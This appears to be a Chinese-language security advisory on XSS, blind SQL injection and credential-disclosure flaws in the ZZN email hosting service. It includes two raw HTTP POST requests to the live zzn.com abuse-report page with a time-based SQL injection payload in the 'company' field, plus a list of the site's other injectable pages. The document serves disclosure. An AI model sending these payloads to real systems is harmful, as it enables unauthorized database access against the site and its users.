ZZN SQL注入/XSS/凭证泄露漏洞
发布日期:2013-08-09
更新日期:2013-08-11
受影响系统:
zzn zzn
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2007-0177
ZZN是虚拟主机电子邮件服务。
ZZN在实现上存在多个XSS、远程盲SQL注入、凭证泄露漏洞,这些漏洞可导致远程攻击者执行未授权数据库操作等。
<*来源:Juan Carlos García
链接:http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=
2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=
Proof Of Concept
----------------
These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 inputs
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 inputs
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 inputs
/membersarea_en/alertwindow.asp - 1 inputs
/membersarea_en/loginerror.asp - 1 inputs
/membersarea_en/support_abuse.asp - 1 inputs
/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs
/membersarea_en/directregister.asp - 1 inputs
/zlog - 1 inputs
/zlog/blog_error.asp - 1 inputs
建议:
--------------------------------------------------------------------------------
厂商补丁:
zzn
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: